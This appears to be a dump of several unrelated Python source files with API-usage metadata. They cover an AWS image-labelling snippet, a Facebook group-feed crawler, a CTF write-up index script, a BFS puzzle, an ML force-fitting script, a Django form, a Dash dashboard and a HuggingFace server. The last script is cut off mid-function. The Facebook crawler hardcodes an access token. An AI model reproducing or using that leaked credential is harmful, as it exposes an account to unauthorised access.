    print('Detected labels in ' + imageFile)
    # Each detected label carries a name and a confidence percentage.
    for label in response['Labels']:
        print (label['Name'] + ' : ' + str(label['Confidence']))
    print('Done...')
{
"api_name": "boto3.client",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "boto3.client",
"line_number": 28,
"usage_type": "call"
}
] |
11316416709 | import facebook
import json
import requests
#young creators group
facebook_group_id = '327549154019925'
# A helper function to pretty-print Python objects as JSON
def pp(o):
    """Pretty-print *o* to stdout as 2-space-indented JSON."""
    formatted = json.dumps(o, indent=2)
    print(formatted)
# Create a connection to the Graph API with your access token
# NOTE(review): committing a live access token is a security risk; it
# should be loaded from the environment and the leaked token rotated.
access_token = 'EAACEdEose0cBABht2FYjCr2DkkBFBHUYNNS84uu34tno0wuUgWXNTmidJO43A8adzb70rIfLhMM8AlLCOnqE3bZAGtXfYM15kZAxK36yrV9Vv43L44BoZCYagLWZB5g0ESDYe6aINtsUX0BR9wZCeSlOIJOfa3ZBJg9Q8CH4pXTAZDZD'
graph = facebook.GraphAPI(access_token, version='2.7')
# First page of the group's feed; later pages are fetched in the loop below.
items = graph.get_connections(facebook_group_id, 'feed')
# Accumulates the crawled entries; page_counter tracks how many pages
# have been fetched so far.
allItems = []
page_counter = 0
# Wrap this block in a while loop so we can keep paginating requests until
# finished.
while(True):
    try:
        # NOTE(review): iterating a dict yields its KEYS (strings such as
        # 'data' / 'paging'), not the feed posts; the posts are presumably
        # under items['data'] — verify the Graph API response shape.
        for item in items:
            allItems.append(item.encode('utf-8'))
        # Attempt to make a request to the next page of data, if it exists.
        items=requests.get(items['paging']['next']).json()
        page_counter = page_counter + 1
        print(items)
        print('\n\n\npages: ' + str(page_counter) +'\n\n\n')
    except KeyError:
        # When there are no more pages (['paging']['next']), break from the
        # loop and end the script.
        break
{
"api_name": "json.dumps",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "facebook.GraphAPI",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 29,
"usage_type": "call"
}
] |
8666976439 | import argparse, os, string, sys
# Parse all parameters
parser = argparse.ArgumentParser()
parser.add_argument('ctfdir', type=str, help='Directory containing all tasks and descriptions, e.g. example-ctf-2015/')
args = parser.parse_args()
# Classify every <ctfdir>/<category>/<task>/README.md as completed,
# external-write-ups-only, or missing, then regenerate the summary
# sections of the top-level README.md.
missing = external = completed = ''
for root, dirs, files in os.walk(args.ctfdir):
    # Only look at directories exactly two path components deep,
    # i.e. <ctfdir>/<category>/<task>.
    rootarr = root.split('/')
    if len(rootarr) != 3:
        continue
    # Task reference relative to the CTF root, e.g. web/task1
    taskref = ''
    for x in range(1, len(rootarr) - 1):
        taskref += rootarr[x] + "/"
    taskref += rootarr[len(rootarr) - 1]
    for f in files:
        if f != 'README.md':
            continue
        f = root + '/' + f
        ref = '[' + taskref + '](' + taskref + ')'
        # Context manager closes the handle (the original leaked the
        # file object returned by the bare open().read()).
        with open(f, 'r') as fh:
            out = fh.read()
        if '## Write-up\n\n(TODO)\n\n' not in out:
            completed += '* ' + ref + '\n'
        elif '## Other write-ups and resources\n\n* none yet' not in out:
            external += '* ' + ref + '\n'
        else:
            missing += '* ' + ref + '\n'
# Rebuild the top-level README: keep everything before the first
# '## Completed write-ups' header, then regenerate the three sections.
readme = ''
with open(args.ctfdir + '/README.md', 'r') as fh:
    orig = fh.read()
with open(args.ctfdir + '/README.md', 'r') as fh:
    for line in fh:
        if line == '## Completed write-ups\n':
            break
        readme += line
readme += '## Completed write-ups\n\n'
if completed == '':
    completed = '* none yet\n'
readme += completed
readme += '\n## External write-ups only\n\n'
if external == '':
    external = '* none yet\n'
readme += external
readme += '\n## Missing write-ups'
if missing != '':
    readme += '\n\n'
# Trim a single trailing newline from each side of the comparison so
# repeated runs are idempotent.
if missing[-1:] == '\n':
    missing = missing[:-1]
if orig[-1:] == '\n':
    orig = orig[:-1]
readme += missing
# Only rewrite the file when the content actually changed.
if readme != orig:
    with open(args.ctfdir + '/README.md', 'w') as rm:
        rm.write(readme)
| ctfs/write-ups-tools | checkreadme.py | checkreadme.py | py | 1,638 | python | en | code | 222 | github-code | 36 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "os.walk",
"line_number": 10,
"usage_type": "call"
}
] |
34212069095 | # https://www.acmicpc.net/problem/1697
# solution dfs
# 1) 현재위치 n에서 가능한 세가지 경우 +1, -1, *2 를 dfs한다
# 2) 이때 dfs의 depth는 탐색 시간을 의미하기에 depth가 현재 최소탐색시간보다 큰 경우는 탐색하지 않는다
# 3) 모든 탐색이 끝난 후 최소탐색시간을 출력한다
# 한계: 파이썬 재귀 depth의 한계(기본적으로 1000) -> ex) 인풋으로 0 100000 이 들어올 경우 10만번 초과 재귀로 런타임 에러
# 좀더 근본적인 한계: 재귀로 탐색하기에는 너무 큰 범위(0 ~ 100000/ +1, -1)
# 조건을 더 줘서 탐색 범위를 줄여보고자 했으나 여전히 시간초과발생
# solution bfs
# 1) 현재위치 n에서 가능한 세가지 경우 +1, -1, *2 를 bfs한다
# 2-1) 이때 방문 여부를 체크하는 배열(visited)에 몇 번째로 방문하는지 count를 입력한다
# 2-2) 즉, q에 visited[next_loc] = visited[loc] + 1 을 저장한다
# 3) k 위치를 탐색 성공하면 최소탐색시간인 visited[k]를 출력한다
# TIL
# dfs는 최단거리를 구하지 않는다. 최단거리를 구하려면 모든 경우를 탐색해야하는데 백트래킹하더라도 시간초과의 위험이 크다
# 더구나 dfs는 재귀를 이용하기에 문제가 많다
# 최단거리 탐색은 bfs를 이용한다
# bfs에서 방문여부 체크하는 동시에 depth 구하는 테크닉
# dfs든 bfs든 방문여부 체크 꼭 하자
import sys
from collections import deque
# def dfs(n,k,depth):
# global min_time, visited
# print(n,depth)
# # 탐색시간 줄이기 위한 코드(임시방편)
# if n>2*k: # n이 너무 커지는 경우 탐색에서 제외
# return
# if depth >20: # 20초과의 depth는 허용않으므로써 재귀 횟수 제한의 문제와 무한루프 문제는 해결
# return
# if depth >= min_time: # 이미 depth가 현재 탐색최소시간 이상이라 더 이상 탐색이 불필요한 경우
# return
# if abs(n-k) == 0: # 탐색성공한경우
# min_time = depth
# return
# if n == 0:
# if visited[n+1] == 0:
# visited[n+1] = 1
# dfs(n+1,k,depth+1)
# visited[n+1] = 0
# else:
# if visited[n*2] == 0:
# visited[n*2] = 1
# dfs(n*2,k,depth+1)
# visited[n*2] = 0
# if visited[n+1] == 0:
# visited[n+1] = 1
# dfs(n+1,k,depth+1)
# visited[n+1] = 0
# if visited[n-1] == 0:
# visited[n-1] = 1
# dfs(n-1,k,depth+1)
# visited[n-1] = 0
def bfs(n, k):
    """Return the minimum number of moves (+1, -1, *2) from n to k.

    Positions live on the closed range [0, 100000]. visited[x] stores
    1 + distance-from-n, so it doubles as the seen-marker and the BFS
    depth counter.
    """
    visited = [0] * 100001
    queue = deque([n])
    visited[n] = 1
    while queue:
        cur = queue.popleft()
        if cur == k:
            # visited holds depth + 1; subtract the initial offset.
            return visited[k] - 1
        for nxt in (cur + 1, cur * 2, cur - 1):
            if 0 <= nxt < 100001 and not visited[nxt]:
                visited[nxt] = visited[cur] + 1
                queue.append(nxt)
if __name__ == "__main__":
n,k = tuple(map(int,input().split()))
print(bfs(n,k))
| chankoo/problem-solving | graph/1697-숨바꼭질.py | 1697-숨바꼭질.py | py | 3,234 | python | ko | code | 1 | github-code | 36 | [
{
"api_name": "collections.deque",
"line_number": 67,
"usage_type": "call"
}
] |
40325909166 | from ase.io import *
import numpy as np
import torch
from torch.autograd import Variable
from torch.nn.parameter import Parameter
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torch.nn.init as init
from sklearn.metrics import mean_squared_error
from math import sqrt
import time
import random
from fingerprint import fingerprint
from sklearn.preprocessing import StandardScaler
import sys
import pickle
#The script belows fits the force components for the H-atoms in dataset.traj. To modify it for fitting O and Pt components, read the comments below.
#Also, please note that the uploaded dataset dataset.traj only contains the first 1000 images of the full data set described in the report. This is due to file size limitations on GitHub.
############## OPTIONS #############
#Data set sizes
N_train = 500 #number of training images
N_valid = 100 #number of test images
Random = False #choose whether to sample random images from the parent data set or use the images from previous run
batch_factor = 50 #optimization will be done with a batch size of N_train/batch_factor
############# Fingerprint options #########
etas = np.linspace(0.2, 4., 20) #Hyperparameter for fingerprint construction
Rc = 0.*np.ones(len(etas)) #Hyperparameter for fingerprint construction
cutoff = 8. #Only consider atoms within cutoff sphere of each atom
preprocess = True #Scale all fingerprint components to have zero mean and unit variance
#Neural network options
num_epochs = 5000 #Number of epochs to perform optimization
epoch_save = 1 #Choose how often results are saved (every epoch_save'th epoch)
num_hidden = 2 #Number of hidden layers in FFNN
num_l1 = 25 #Number of nodes in first hidden layer
num_l2 = 25 #Number of nodes in second hidden layer
lr = 0.01 #Learning rate for optimizer
weight_decay = 0 #Weight decay when using regularization
################ LOAD TEST AND TRAINING IMAGES ####################
#Training images
if Random == True:
indices = random.sample(range(1000), N_train+N_valid) #due to file size limitations dataset.traj contains only the first 1000 images of the original data set.
images = []
for index in indices:
image = read('../dataset.traj', index = index)
images.append(image)
train_images = images[0:N_train]
valid_images = images[N_train:]
write('images.traj', images)
write('train_images.traj', train_images)
write('valid_images.traj', valid_images)
else:
images = read('images.traj', index = ':')
train_images = read('images.traj', index = ':')
valid_images = read('valid_images.traj', index = ':')
############ GET FORCE COMPONENTS #############
#Training images
for count, atoms in enumerate(train_images):
f = atoms.get_forces()[80:144] #In this case we get the forces on the H atoms. For Pt and O this should be changed.
f = f.flatten()
if count == 0:
forces_train = f
else:
forces_train = np.concatenate((forces_train, f), axis = 0)
#Test images
for count, atoms in enumerate(valid_images):
f = atoms.get_forces()[80:144] #In this case we get the forces on the H atoms. For Pt and O this should be changed.
f = f.flatten()
if count == 0:
forces_valid = f
else:
forces_valid = np.concatenate((forces_valid, f), axis = 0)
########### FINGERPRINTS #####################
fingerprints = fingerprint(images, cutoff, etas, Rc, 'H', cutoff_function = False) #fingerprints are calculated with function from fingerprint.py.
if preprocess == True:
ssc = StandardScaler()
fingerprints = ssc.fit_transform(fingerprints)
fingerprints_train = fingerprints[0:N_train*3*64,:] #The number 64 should be changed to 32 or 48 for the case of O or Pt.
fingerprints_valid = fingerprints[N_train*3*64:] #The number 64 should be changed to 32 or 48 for the case of O or Pt.
########### FEED-FORWARD NEURAL NETWORK ################
# define network
class Net(nn.Module):
    """Feed-forward network with one or two sigmoid hidden layers.

    Weights are Xavier-initialized and biases start at zero. The depth
    (1 or 2 hidden layers) is fixed at construction time.

    :param num_features: size of each input vector.
    :param num_l1: nodes in the first hidden layer.
    :param num_l2: nodes in the second hidden layer (ignored if num_hidden == 1).
    :param num_hidden: number of hidden layers, 1 or 2.
    :param num_out: size of the output (1 force component here).
    """
    def __init__(self, num_features, num_l1, num_l2, num_hidden, num_out):
        super(Net, self).__init__()
        # Store the depth on the instance: the original forward() read the
        # module-level global `num_hidden`, which silently breaks if the
        # class is reused with a different depth.
        self.num_hidden = num_hidden
        # input layer -> first hidden layer
        self.W_1 = Parameter(init.xavier_normal_(torch.Tensor(num_l1, num_features)))
        self.b_1 = Parameter(init.constant_(torch.Tensor(num_l1), 0))
        if num_hidden == 1:
            # first hidden layer -> output
            self.W_2 = Parameter(init.xavier_normal_(torch.Tensor(num_out, num_l1)))
            self.b_2 = Parameter(init.constant_(torch.Tensor(num_out), 0))
        if num_hidden == 2:
            # first hidden layer -> second hidden layer
            self.W_2 = Parameter(init.xavier_normal_(torch.Tensor(num_l2, num_l1)))
            self.b_2 = Parameter(init.constant_(torch.Tensor(num_l2), 0))
            # second hidden layer -> output
            self.W_3 = Parameter(init.xavier_normal_(torch.Tensor(num_out, num_l2)))
            self.b_3 = Parameter(init.constant_(torch.Tensor(num_out), 0))
        # define activation function in constructor
        self.activation = torch.nn.Sigmoid()

    def forward(self, x):
        x = F.linear(x, self.W_1, self.b_1)
        x = self.activation(x)
        x = F.linear(x, self.W_2, self.b_2)
        if self.num_hidden == 1:
            return x
        x = self.activation(x)
        x = F.linear(x, self.W_3, self.b_3)
        return x
num_input = fingerprints_train.shape[1] #number of inputs is len(etas)*len(species).
num_out = 1 #There is ONE force component to be output for each input vector.
net = Net(num_input, num_l1, num_l2, num_hidden, num_out)
#Set up optimizer and loss function
optimizer = optim.Adam(net.parameters(), lr = lr, weight_decay = weight_decay)
criterion = nn.MSELoss()
################## TRAINING ###########################
# hyperparameters
batch_size_train = int(len(train_images)*64*3/batch_factor) #The number 64 should be changed to 32 or 48 for the case of O or Pt.
num_samples_train = fingerprints_train.shape[0]
num_batches_train = num_samples_train // batch_size_train
batch_size_valid = int(len(valid_images)*64*3/batch_factor) #The number 64 should be changed to 32 or 48 for the case of O or Pt.
num_samples_valid = fingerprints_valid.shape[0]
num_batches_valid = num_samples_valid // batch_size_valid
# setting up lists for handling loss/accuracy
train_acc, train_loss, train_resid = [], [], []
valid_acc, valid_loss, valid_resid = [], [], []
epochs = []
cur_loss = 0
losses = []
get_slice = lambda i, size: range(i * size, (i + 1) * size)
for epoch in range(num_epochs):
cur_loss = 0
net.train()
for i in range(num_batches_train):
slce = get_slice(i, batch_size_train)
fingerprint_batch = Variable(torch.from_numpy(fingerprints_train[slce]).float())
output = net(fingerprint_batch)[:,0]
# compute gradients given loss
forces_batch = Variable(torch.from_numpy(forces_train[slce]).float())
batch_loss = criterion(output, forces_batch)
optimizer.zero_grad()
batch_loss.backward()
optimizer.step()
cur_loss += batch_loss
losses.append(cur_loss)
net.eval()
### Evaluate training
train_preds, train_targs = [], []
for i in range(num_batches_train):
slce = get_slice(i, batch_size_train)
fingerprint_batch = Variable(torch.from_numpy(fingerprints_train[slce]).float())
forces_batch = Variable(torch.from_numpy(forces_train[slce]).float())
output = net(fingerprint_batch)
preds = output[:,0]
train_targs += list(forces_train[slce])
train_preds += list(preds.data.numpy())
### Evaluate validation
val_preds, val_targs = [], []
for i in range(num_batches_valid):
slce = get_slice(i, batch_size_valid)
fingerprint_batch = Variable(torch.from_numpy(fingerprints_valid[slce]).float())
output = net(fingerprint_batch)
preds = output[:,0]
val_preds += list(preds.data.numpy())
val_targs += list(forces_valid[slce])
train_acc_cur = sqrt(mean_squared_error(train_targs, train_preds))
valid_acc_cur = sqrt(mean_squared_error(val_targs, val_preds))
train_resid_cur = (np.array(train_targs) - np.array(train_preds)).max()
valid_resid_cur = (np.array(val_targs) - np.array(val_preds)).max()
if epoch/epoch_save == epoch//epoch_save:
print("Epoch %2i : Train Loss %f , Train acc %f, Valid acc %f" % (epoch+1, losses[-1], train_acc_cur, valid_acc_cur))
epochs.append(epoch)
train_acc.append(train_acc_cur)
valid_acc.append(valid_acc_cur)
train_resid.append(train_resid_cur)
valid_resid.append(valid_resid_cur)
train_summary = {}
train_summary['epochs'] = epochs
train_summary['train_acc'] = train_acc
train_summary['train_resid'] = train_resid
train_summary['valid_acc'] = valid_acc
train_summary['valid_resid'] = valid_resid
train_summary['val_targs'] = val_targs
train_summary['val_preds'] = val_preds
train_summary['train_targs'] = train_targs
train_summary['train_preds'] = train_preds
with open('train_summary.pickle', 'wb') as f:
pickle.dump(train_summary, f)
| Augustegm/Water-Pt | Water-Pt(111)/NeuralNet.py | NeuralNet.py | py | 9,197 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.linspace",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "numpy.ones",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "random.sample",
"line_number": 50,
"usage_type": "call"
},
{
"api_name": "numpy.concatenate",
"line... |
3962464959 | import datetime
from django import forms
from django.core.exceptions import ValidationError
from .models import Appointment
from django.contrib.auth.models import User
class DateInput(forms.DateInput):
    """
    Django DateInput rendered with type="date" so browsers show their
    native date picker for this field.
    """
    input_type = 'date'
class TimeInput(forms.TimeInput):
    """
    Django TimeInput rendered as a plain text input; a JS timepicker is
    presumably attached via the 'timepicker' CSS class set in
    AppointmentForm's widgets — confirm against the front-end assets.
    """
    input_type = 'text'
class AppointmentForm(forms.ModelForm):
    """
    Form for creating and updating an appointment.

    Attributes:
    - user_id (int): The ID of the user associated with the appointment.

    Methods:
    - __init__(user_id, *args, **kwargs): Initializes the form instance.
    - clean(): Performs form validation and cleans the form data.
    """

    def __init__(self, user_id, *args, **kwargs):
        """
        Initializes the form instance, remembering the owning user so
        clean() can stamp it onto the model instance.
        """
        self.user_id = user_id
        super(AppointmentForm, self).__init__(*args, **kwargs)

    def clean(self):
        """
        Performs form validation and cleans the form data.

        Checks for conflicts with existing appointments and validates the
        date. Field-level failures leave entries missing from cleaned_data,
        so the cross-field checks are guarded against None (the original
        raised TypeError comparing None < date in that situation instead of
        surfacing the field errors).

        Raises:
        - forms.ValidationError: If there is a conflict with an existing appointment or date is in the past. # noqa
        """
        super().clean()
        self.instance.user_id = self.user_id
        date = self.cleaned_data.get("date")
        time = self.cleaned_data.get("time")
        nutritionist = self.cleaned_data.get('nutritionist')
        # Only run the conflict query when every involved field passed its
        # own validation.
        if date and time and nutritionist:
            conflicts = Appointment.objects.filter(date=date).filter(time=time).filter(nutritionist=nutritionist).exclude(pk=self.instance.pk)  # noqa
            if conflicts.exists():
                raise forms.ValidationError("This appointment conflicts with an existing appointment.")  # noqa
        if date and date < datetime.date.today():
            raise forms.ValidationError("The date cannot be in the past!")

    class Meta:
        model = Appointment
        fields = [
            'date',
            'time',
            'reason',
            'nutritionist',
        ]
        widgets = {
            'date': DateInput(attrs={
                # Bookable window: from today up to 30 days ahead.
                'min': datetime.date.today() + datetime.timedelta(days=0),
                'max': datetime.date.today() + datetime.timedelta(days=30)
            }),
            'time': TimeInput(attrs={
                'class': 'timepicker'
            }),
            'nutritionist': forms.Select(attrs={'class': 'form-select'}),
        }
| Giov3ss/iHealthy | appointments/forms.py | forms.py | py | 2,524 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.forms.DateInput",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "django.forms",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "django.forms.TimeInput",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "dj... |
22353413985 | from typing import Any, Dict, List
import numpy as np
import transformers
import mlrun
from mlrun.serving.v2_serving import V2ModelServer
class HuggingFaceModelServer(V2ModelServer):
    """
    Hugging Face Model serving class, inheriting the V2ModelServer class for being initialized automatically by the
    model server and be able to run locally as part of a nuclio serverless function, or as part of a real-time pipeline.
    Notice:
        In order to use this serving class, please ensure that the transformers package is installed.
    """

    def __init__(
        self,
        context: mlrun.MLClientCtx = None,
        name: str = None,
        task: str = None,
        model_path: str = None,
        model_name: str = None,
        model_class: str = None,
        tokenizer_name: str = None,
        tokenizer_class: str = None,
        framework: str = None,
        **class_args,
    ):
        """
        Initialize a serving class for a Hugging face model.
        :param context:         For internal use (passed in init).
        :param name:            The name of this server to be initialized
        :param task:            The task defining which pipeline will be returned.
        :param model_path:      Not in use. When adding a model pass any string value
        :param model_name:      The model's name in the Hugging Face hub
                                e.g., `nlptown/bert-base-multilingual-uncased-sentiment`
        :param model_class:     The model class type object which can be passed as the class's name (string).
                                Must be provided and to be matched with `model_name`.
                                e.g., `AutoModelForSequenceClassification`
        :param tokenizer_name:  The name of the tokenizer in the Hugging Face hub
                                e.g., `nlptown/bert-base-multilingual-uncased-sentiment`
        :param tokenizer_class: The model's class type object which can be passed as the class's name (string).
                                Must be provided and to be matched with `model_name`.
                                e.g., `AutoTokenizer`
        :param framework:       The framework to use, either `"pt"` for PyTorch or `"tf"` for TensorFlow. The specified
                                framework must be installed.
                                If no framework is specified, will default to the one currently installed.
                                If no framework is specified and both frameworks are installed, will default to the
                                framework of the `model`, or to PyTorch if no model is provided
        :param class_args:      -
        """
        super(HuggingFaceModelServer, self).__init__(
            context=context,
            name=name,
            model_path=model_path,
            **class_args,
        )
        self.task = task
        # Model / tokenizer objects are loaded lazily in `load()`:
        self.model = None
        self.tokenizer = None
        self.model_name = model_name
        self.tokenizer_name = tokenizer_name
        self.model_class = model_class
        self.tokenizer_class = tokenizer_class
        self.framework = framework
        self.pipe = None

    def load(self):
        """
        loads the model and the tokenizer and initializes the pipeline based on them.
        """
        # Loading the pretrained model:
        if self.model_class:
            model_object = getattr(transformers, self.model_class)
            self.model = model_object.from_pretrained(self.model_name)

        # Loading the pretrained tokenizer:
        if self.tokenizer_class:
            tokenizer_object = getattr(transformers, self.tokenizer_class)
            self.tokenizer = tokenizer_object.from_pretrained(self.tokenizer_name)

        # Initializing the pipeline (falls back to the hub name when no model
        # object was loaded above):
        self.pipe = transformers.pipeline(
            task=self.task,
            model=self.model or self.model_name,
            tokenizer=self.tokenizer,
            framework=self.framework,
        )

    def predict(self, request: Dict[str, Any]) -> List:
        """
        Generate model predictions from sample.
        :param request: The request to the model. The input to the model will be read from the "inputs" key.
        :return: The model's prediction on the given input.
        """
        # Get the inputs:
        inputs = request["inputs"]

        # Applying prediction according to the inputs shape.
        # Fix: guard `inputs[0]` so an empty inputs list no longer raises
        # IndexError (an empty list simply yields an empty result).
        result = (
            [self.pipe(**_input) for _input in inputs]
            if inputs and isinstance(inputs[0], dict)
            else self.pipe(inputs)
        )
        # Arranging the result into a List[Dict]
        # (This is necessary because the result may vary from one model to another)
        if all(isinstance(res, list) for res in result):
            result = [res[0] for res in result]
        # Converting JSON non-serializable numpy objects to native types:
        for res in result:
            for key, val in res.items():
                if isinstance(val, np.generic):
                    res[key] = val.item()
                elif isinstance(val, np.ndarray):
                    res[key] = val.tolist()
        return result

    def explain(self, request: Dict) -> str:
        """
        Return a string explaining what model is being served in this serving function and the function name.
        :param request: A given request.
        :return: Explanation string.
        """
        # Fix: the original f-string was missing the closing quote after
        # `{self.name}`, producing an unbalanced message.
        return f"The '{self.model_name}' model serving function named '{self.name}'"
| mlrun/mlrun | mlrun/frameworks/huggingface/model_server.py | model_server.py | py | 5,513 | python | en | code | 1,129 | github-code | 36 | [
{
"api_name": "mlrun.serving.v2_serving.V2ModelServer",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "mlrun.MLClientCtx",
"line_number": 20,
"usage_type": "attribute"
},
{
"api_name": "transformers.pipeline",
"line_number": 86,
"usage_type": "call"
},
{
... |
73985065704 | from datetime import datetime, timedelta
from typing import Union
from uuid import uuid4
from django.apps import AppConfig
from django.conf import settings
class DjangoLightAuthConfig(AppConfig):
    """App config holding the light-auth settings, with defaults that can be
    overridden via ``LIGHT_AUTH_*`` entries in Django settings."""

    name = "django_light_auth"
    default = True

    # Defaults; ready() may override each one from settings.
    login_path = "/login"
    logout_path = "/logout"
    success_path = "/"
    validate_func = "django_light_auth.light_auth_validate_func"
    allow_paths = set()
    token = uuid4().hex
    # https://docs.djangoproject.com/en/3.1/topics/http/sessions/
    expiry: Union[None, int, datetime, timedelta] = 3600  # 1 hour

    def ready(self):
        """Pull LIGHT_AUTH_* overrides out of Django settings."""
        # Custom validation callable (dotted path).
        func_override = getattr(settings, "LIGHT_AUTH_VALIDATE_FUNC", "")
        if func_override:
            self.validate_func = func_override

        # Login / logout endpoints (trailing slashes stripped).
        login_override = getattr(settings, "LIGHT_AUTH_LOGIN_PATH", "")
        if login_override:
            self.login_path = login_override.rstrip("/")
        logout_override = getattr(settings, "LIGHT_AUTH_LOGOUT_PATH", "")
        if logout_override:
            self.logout_path = logout_override.rstrip("/")
        # Both auth endpoints must be reachable without a session.
        self.allow_paths.add(self.login_path)
        self.allow_paths.add(self.logout_path)

        # Session expiry policy.
        expiry_override = getattr(settings, "LIGHT_AUTH_EXPIRY", None)
        if expiry_override is None:
            # https://docs.djangoproject.com/en/3.1/topics/http/sessions/
            # "If value is None, the session reverts to using the global
            # session expiry policy."
            self.expiry = None
        elif isinstance(expiry_override, int) and expiry_override >= 0:
            self.expiry = expiry_override
        elif isinstance(expiry_override, (datetime, timedelta)):
            self.expiry = expiry_override
| rexzhang/django-light-auth | django_light_auth/apps.py | apps.py | py | 1,598 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.apps.AppConfig",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "uuid.uuid4",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "typing.Union",
"line_number": 23,
"usage_type": "name"
},
{
"api_name": "datetime.datetime",
... |
34541981528 | import dash
from dash import html
from dash import dcc
from dash.dependencies import Input, Output
import dash_bootstrap_components as dbc
import pandas as pd
import numpy as np
import calendar
import plotly.express as px
import plotly.graph_objects as go
import datamodel
# Load the sales data and the (currently unused here) year/month aggregates.
# `df_year` / `df_month` are kept at module level -- presumably for other
# callbacks or imports; verify before removing.
order = datamodel.get_data()
df_year = datamodel.get_year()
df_month = datamodel.get_month()
# Bar chart: total sales per employee, split by product type.
# NOTE(review): the 'font' key inside `labels` is not a column name, so
# Plotly Express ignores it -- it looks like a styling option placed in the
# wrong argument; confirm and move to `update_layout` if intended.
fig_employee = px.bar(order,
             x='emp_name', y='total',
             color='type', text='total', title='SALES BY EMPLOYEE',
             color_discrete_sequence=["darkred", "green"],
             template='plotly_dark',
             hover_data=[],
             labels={'total':'Total sales', 'emp_name':'Employee', 'type':'Product Type', 'font': {'color': 'white'}})
# Abbreviate bar labels (SI format) and tilt the x-axis ticks for readability.
fig_employee.update_traces(texttemplate='%{text:.2s}', textposition='outside')
fig_employee.update_layout(uniformtext_minsize=8, uniformtext_mode='hide', xaxis_tickangle=45)
# Bar chart: total sales per product, split by product type.
fig_products = px.bar(order,
             x='productname', y='total',
             color='type', text='total', title='SALES BY PRODUCTS',
             color_discrete_sequence=["darkred", "green"],
             template='plotly_dark',
             hover_data=[],
             labels={'total':'Total sales', 'productname':'Product', 'type':'Product Type'})
fig_products.update_traces(texttemplate='%{text:.2s}', textposition='outside')
fig_products.update_layout(uniformtext_minsize=8, uniformtext_mode='hide', xaxis_tickangle=45)
# `app` exposes the underlying Flask server for WSGI deployment
# (e.g. `gunicorn app:app`) -- do not rename.
dash_app = dash.Dash(__name__)
app = dash_app.server
# Page layout: both graphs stacked in a single row container.
dash_app.layout = html.Div(style={'backgroundColor':'lightgrey'},
    children=[
        html.Div(className='row',
                children=[
                    html.Div(
                        children=[
                            dcc.Graph(id="sales_employee", figure=fig_employee),
                            dcc.Graph(id="sales_product", figure=fig_products)])
                ]
        ),
    ]
)
# Local development entry point (debug server, not for production).
if __name__ == '__main__':
    dash_app.run_server(debug=True)
| Patriciatworek1998/patr_demo_dash | app.py | app.py | py | 1,928 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "datamodel.get_data",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "datamodel.get_year",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "datamodel.get_month",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "plotly.expr... |
6314719484 | import os
import sys
os.environ["TOKENIZERS_PARALLELISM"] = "true"
sys.path.insert(0, os.getcwd())
import gc
import time
import random
import warnings
warnings.filterwarnings("ignore")
import wandb
import os
import sys
import argparse
from datasets import load_dataset
import torch
from transformers import AutoTokenizer
from src.data.preprocess import preprocess_text, get_max_len_from_df
from src.dataset.collators import collate
from src.dataset.EmotionDataset import get_valid_dataloader, get_train_dataloader
from src.adversarial_learning.awp import AWP
import numpy as np
from src.utils import AverageMeter, time_since, get_config, dictionary_to_namespace
from src.models.utils import get_model
from optimizer.optimizer import get_optimizer
from criterion.criterion import get_criterion
from scheduler.scheduler import get_scheduler
from criterion.score import get_score
def parse_args():
    """Parse command-line options for a training run.

    Returns a namespace with ``cfg`` (config file path, required),
    ``run_id`` (unique run identifier, required) and ``use_wandb`` (flag).
    """
    cli = argparse.ArgumentParser()
    cli.add_argument('--cfg', type=str, required=True)
    cli.add_argument('--run_id', type=str, required=True)
    cli.add_argument('--use_wandb', action='store_true')
    return cli.parse_args()
def load_data():
    """Download the dair-ai/emotion dataset and return its splits.

    :return: ``(train_df, val_df, test_df)`` as pandas DataFrames.
    """
    emotion = load_dataset("dair-ai/emotion")
    emotion.set_format(type="pandas")
    # Slicing a split with [:] materialises it as a pandas DataFrame.
    frames = [emotion[split][:] for split in ("train", "validation", "test")]
    return tuple(frames)
def get_tokenizer(config):
    """Build the fast tokenizer for the configured backbone and persist it.

    The tokenizer is saved to ``config.general.tokenizer_dir_path`` so that
    inference can later reload the exact same vocabulary.
    """
    backbone = config.model.backbone_type
    tokenizer = AutoTokenizer.from_pretrained(backbone, use_fast=True)
    tokenizer.save_pretrained(config.general.tokenizer_dir_path)
    return tokenizer
def seed_everything(seed=42):
    """Seed every RNG used in training (Python, NumPy, PyTorch) for reproducibility.

    :param seed: seed applied to all generators and exported as PYTHONHASHSEED.
    """
    random.seed(seed)
    os.environ['PYTHONHASHSEED'] = str(seed)
    np.random.seed(seed)
    torch.manual_seed(seed)
    torch.cuda.manual_seed(seed)
    torch.backends.cudnn.deterministic = True
    # Fix: benchmark mode lets cuDNN auto-tune and pick different algorithms
    # between runs, which defeats `deterministic = True` above. It must be
    # disabled for reproducible training (per the PyTorch reproducibility notes).
    torch.backends.cudnn.benchmark = False
def valid_fn(config, valid_dataloader, model, criterion, epoch, device):
    """Run one full validation pass.

    :param config:           namespace with `general.valid_print_frequency` and
                             `logging.use_wandb`.
    :param valid_dataloader: yields (inputs, labels) batches.
    :param model:            model under evaluation (switched to eval mode here).
    :param criterion:        loss function applied to (predictions, labels).
    :param epoch:            current epoch index (0-based; printed 1-based).
    :param device:           torch device the batches are moved to.
    :return: (valid_losses AverageMeter, concatenated prediction array).
    """
    valid_losses = AverageMeter()
    model.eval()
    predictions = []
    start = time.time()
    for step, (inputs, labels) in enumerate(valid_dataloader):
        inputs = collate(inputs)
        # Move every tensor of the batch dict onto the target device.
